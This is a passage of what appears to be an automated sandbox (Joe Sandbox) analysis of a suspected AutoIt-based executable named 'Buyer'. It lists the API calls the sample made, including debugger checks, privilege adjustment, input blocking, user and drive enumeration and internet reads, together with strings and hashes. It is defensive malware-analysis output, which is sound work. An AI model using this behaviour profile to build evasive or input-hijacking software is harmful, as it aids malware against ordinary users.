                                                                                                    Similarity
                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                    • String ID: SCRIPT
                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                    • Opcode ID: a2d6f406630c4fe2336536d3b1061c97e4eeed8f8bd9247236c63b4597816e3e
                                                                                                    • Instruction ID: d33bfbc22cd79885e7db698bf1446539be9d12f407486cda9c2afbf02a5fc813
                                                                                                    • Opcode Fuzzy Hash: a2d6f406630c4fe2336536d3b1061c97e4eeed8f8bd9247236c63b4597816e3e
                                                                                                    • Instruction Fuzzy Hash: 5F11A0B4640304BFD7218B66DC88F677BBEEFC5B11F20416DB44196150DB71E800AA21
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00FBA2E7
                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00FBA3FA
                                                                                                      • Part of subcall function 00FB3FE3: GetInputState.USER32 ref: 00FB403A
                                                                                                      • Part of subcall function 00FB3FE3: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB40D5
                                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00FBA317
                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00FBA3E4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 1972594611-438819550
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F59C7E
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00F59D53
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00F59D66
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Color$LongProcWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3131106179-0
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                    • String ID:
                                                                                                    • API String ID: 292994002-0
                                                                                                    APIs
                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00FBD5F8
                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00FBD659
                                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 00FBD66D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 234945975-0
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: LocalTime
                                                                                                    • String ID: %.3d$X64
                                                                                                    • API String ID: 481472006-1077770165
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00F729DA
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00F729E4
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00F729F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00F6500E,?,010098A8,0000000C,00F65165,?,00000002,00000000), ref: 00F65059
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00F6500E,?,010098A8,0000000C,00F65165,?,00000002,00000000), ref: 00F65060
                                                                                                    • ExitProcess.KERNEL32 ref: 00F65072
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    APIs
                                                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00FAEA2E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: mouse_event
                                                                                                    • String ID: DOWN
                                                                                                    • API String ID: 2434400541-711622031
                                                                                                    APIs
                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00F9E526
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: NameUser
                                                                                                    • String ID: X64
                                                                                                    • API String ID: 2645101109-893830106
                                                                                                    APIs
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FA18DE), ref: 00FA17B6
                                                                                                    • CloseHandle.KERNEL32(?,?,00FA18DE), ref: 00FA17CB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                    • String ID:
                                                                                                    • API String ID: 81990902-0
                                                                                                    • Opcode ID: 945ee9c6646d007904ce896a0a4b05838bdc59bbe349043c79d2320c229ace37
                                                                                                    • Instruction ID: 407648881364abb043aa615e2fba2484b1cdc855e3ac3d1fc3e7d28085ed149d
                                                                                                    • Opcode Fuzzy Hash: 945ee9c6646d007904ce896a0a4b05838bdc59bbe349043c79d2320c229ace37
                                                                                                    • Instruction Fuzzy Hash: 86E0BF72015614AFF7652B20FC0AE7777E9FB05720F24881EF59581470DB626C90FB50
                                                                                                    APIs
                                                                                                    • BlockInput.USER32(00000001), ref: 00FBF244
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BlockInput
                                                                                                    • String ID:
                                                                                                    • API String ID: 3456056419-0
                                                                                                    • Opcode ID: a7d7fef4f8c09d903ce85c71c64bf667e7f134e567509d344a60ee63908a0199
                                                                                                    • Instruction ID: d03d1bdc776d11f042037d5ba5134bf2d1f2b5e816e57ec32513e886072f707e
                                                                                                    • Opcode Fuzzy Hash: a7d7fef4f8c09d903ce85c71c64bf667e7f134e567509d344a60ee63908a0199
                                                                                                    • Instruction Fuzzy Hash: 21E04F362102049FC710AF6ADC44A9ABBECAF94764F00C026FD49C7351DAB4FC45AF91
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00020D31,00F6073E), ref: 00F60D2A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: 5e52c000b06a8cc7161a58330b560813bbb3c64cb6a5b8d5d78fffc87a295485
                                                                                                    • Instruction ID: bbc75979f5bf55fe5a3a6d0b2b47fb84e11ca2ef2f824557dcf636342a1b4731
                                                                                                    • Opcode Fuzzy Hash: 5e52c000b06a8cc7161a58330b560813bbb3c64cb6a5b8d5d78fffc87a295485
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    APIs
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FC32B7
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FC32CA
                                                                                                    • DestroyWindow.USER32 ref: 00FC32D9
                                                                                                    • GetDesktopWindow.USER32 ref: 00FC32F4
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00FC32FB
                                                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00FC342A
                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00FC3438
                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC347F
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00FC348B
                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00FC34C7
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC34E9
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC34FC
                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC3507
                                                                                                    • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC3510
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC351F
                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC3528
                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC352F
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00FC353A
                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC354C
                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FE0C20,00000000), ref: 00FC3562
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00FC3572
                                                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00FC3598
                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00FC35B7
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC35D9
                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC37C6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                    • Opcode ID: e8bc46b57140fa50be99b1ed9cff6d812ab5cc9af1c5b733176179f9bc762f1b
                                                                                                    • Instruction ID: d6bb9fdd6dc5a718e0934647a8eb02a63c4c6093c3896bc9cfe77fa987f4ae2a
                                                                                                    • Opcode Fuzzy Hash: e8bc46b57140fa50be99b1ed9cff6d812ab5cc9af1c5b733176179f9bc762f1b
                                                                                                    • Instruction Fuzzy Hash: BF026D71900209AFDB14DF64CD89EAE7BBAEF48310F148159F915AB291CB74ED01EF60
                                                                                                    APIs
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00FD77FA
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FD782B
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00FD7837
                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00FD7851
                                                                                                    • SelectObject.GDI32(?,?), ref: 00FD7860
                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00FD788B
                                                                                                    • GetSysColor.USER32(00000010), ref: 00FD7893
                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00FD789A
                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 00FD78A9
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FD78B0
                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00FD78FB
                                                                                                    • FillRect.USER32(?,?,?), ref: 00FD792D
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FD794F
                                                                                                      • Part of subcall function 00FD7AB3: GetSysColor.USER32(00000012), ref: 00FD7AEC
                                                                                                      • Part of subcall function 00FD7AB3: SetTextColor.GDI32(?,?), ref: 00FD7AF0
                                                                                                      • Part of subcall function 00FD7AB3: GetSysColorBrush.USER32(0000000F), ref: 00FD7B06
                                                                                                      • Part of subcall function 00FD7AB3: GetSysColor.USER32(0000000F), ref: 00FD7B11
                                                                                                      • Part of subcall function 00FD7AB3: GetSysColor.USER32(00000011), ref: 00FD7B2E
                                                                                                      • Part of subcall function 00FD7AB3: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FD7B3C
                                                                                                      • Part of subcall function 00FD7AB3: SelectObject.GDI32(?,00000000), ref: 00FD7B4D
                                                                                                      • Part of subcall function 00FD7AB3: SetBkColor.GDI32(?,00000000), ref: 00FD7B56
                                                                                                      • Part of subcall function 00FD7AB3: SelectObject.GDI32(?,?), ref: 00FD7B63
                                                                                                      • Part of subcall function 00FD7AB3: InflateRect.USER32(?,000000FF,000000FF), ref: 00FD7B82
                                                                                                      • Part of subcall function 00FD7AB3: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FD7B99
                                                                                                      • Part of subcall function 00FD7AB3: GetWindowLongW.USER32(00000000,000000F0), ref: 00FD7BA6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                    • String ID:
                                                                                                    • API String ID: 4124339563-0
                                                                                                    • Opcode ID: 79f833edf5cc575d3ce4ce741f45c249d3a0ef3e0f262459a3798f5cd8b87c8a
                                                                                                    • Instruction ID: d571539164bd1b3b3e3a82de81447c261cf24680a8d0ffa2ac12c07c5cd369b1
                                                                                                    • Opcode Fuzzy Hash: 79f833edf5cc575d3ce4ce741f45c249d3a0ef3e0f262459a3798f5cd8b87c8a
                                                                                                    • Instruction Fuzzy Hash: CCA1A272409305AFD701AF74DC48B6BBBAAFF48324F140A1AF9629A1E0E735D944EB51
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?,?), ref: 00F59139
                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F9716B
                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F971A4
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F975E9
                                                                                                      • Part of subcall function 00F59287: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F58F0D,?,00000000,?,?,?,?,00F58EDF,00000000,?), ref: 00F592EA
                                                                                                    • SendMessageW.USER32(?,00001053), ref: 00F97625
                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F9763C
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F97652
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F9765D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 2760611726-4108050209
                                                                                                    • Opcode ID: f07354c07f29f35962eb390cc1d99a107ce6a3d8112be5f5584d90ec59a49573
                                                                                                    • Instruction ID: b7d1f6668fa51d0cb64e5eaa2792070bc020901f0512ff0743cc16c409cc7d60
                                                                                                    • Opcode Fuzzy Hash: f07354c07f29f35962eb390cc1d99a107ce6a3d8112be5f5584d90ec59a49573
                                                                                                    • Instruction Fuzzy Hash: BD12E330A18752DFEB29EF28C848BA5B7B2FF44321F184469F9858B251C735E846EF51
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(00000000), ref: 00FC2EC5
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00FC2FF1
                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00FC3030
                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00FC3040
                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00FC3087
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00FC3093
                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00FC30DC
                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00FC30EB
                                                                                                    • GetStockObject.GDI32(00000011), ref: 00FC30FB
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00FC30FF
                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00FC310F
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FC3118
                                                                                                    • DeleteDC.GDI32(00000000), ref: 00FC3121
                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00FC314D
                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00FC3164
                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00FC31A4
                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00FC31B8
                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00FC31C9
                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00FC31FE
                                                                                                    • GetStockObject.GDI32(00000011), ref: 00FC3209
                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00FC3214
                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00FC321E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                    • API String ID: 2910397461-517079104
                                                                                                    • Opcode ID: e3d48bdfd25579c96941a24b2975ca9e7d2998331050441d91666127415a7836
                                                                                                    • Instruction ID: 9f14b17f2e94d62e397659c859f4e799f6b0af8e2920a08296aafb0cb3bc786a
                                                                                                    • Opcode Fuzzy Hash: e3d48bdfd25579c96941a24b2975ca9e7d2998331050441d91666127415a7836
                                                                                                    • Instruction Fuzzy Hash: 5FB14DB1A40219AFEB24DF68DD46FAE7BB9EB48710F108119F915E7290C778ED00DB90
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00FB525C
                                                                                                    • GetDriveTypeW.KERNEL32(?,00FDDB28,?,\\.\,00FDDC1C), ref: 00FB5339
                                                                                                    • SetErrorMode.KERNEL32(00000000,00FDDB28,?,\\.\,00FDDC1C), ref: 00FB54A5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                    • Opcode ID: 202d1d6312136ca3ba5a1b584c3013b8bb0ae00658018de959fcd4f8e74b59fc
                                                                                                    • Instruction ID: 96db470b20c5ca3dca8f19eac23c2d68a0f7906a6947aa3b72b7ffac9ca572ce
                                                                                                    • Opcode Fuzzy Hash: 202d1d6312136ca3ba5a1b584c3013b8bb0ae00658018de959fcd4f8e74b59fc
                                                                                                    • Instruction Fuzzy Hash: 5D61C336600A08DFD706EB26CD51BB877B1AB00B15F28845AE486AF391C67DAD81FF51
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00FD6C93
                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00FD6D4C
                                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00FD6D68
                                                                                                    • GetMenuItemInfoW.USER32(?,00000030,00000000,?), ref: 00FD6DB9
                                                                                                    • SetMenuItemInfoW.USER32(?,00000030,00000000,00000030), ref: 00FD6E14
                                                                                                    • GetMenuItemInfoW.USER32(00000200,00000030,00000000,00000030), ref: 00FD6E37
                                                                                                    • SetMenuDefaultItem.USER32(00000200,?,00000000), ref: 00FD6E53
                                                                                                    • DrawMenuBar.USER32(?), ref: 00FD6E5F
                                                                                                    • SendMessageW.USER32(00000466,00000466,00000000,00000000), ref: 00FD6EE1
                                                                                                    • SendMessageW.USER32(000000F1,000000F1,?,00000000), ref: 00FD702F
                                                                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00FD7053
                                                                                                    • GetFocus.USER32 ref: 00FD7059
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,?), ref: 00FD7114
                                                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 00FD7127
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00FD715E
                                                                                                    • EnableWindow.USER32(00000001,00000001), ref: 00FD717A
                                                                                                    • ShowWindow.USER32(00000010,00000000), ref: 00FD71F0
                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00FD7206
                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00FD721F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
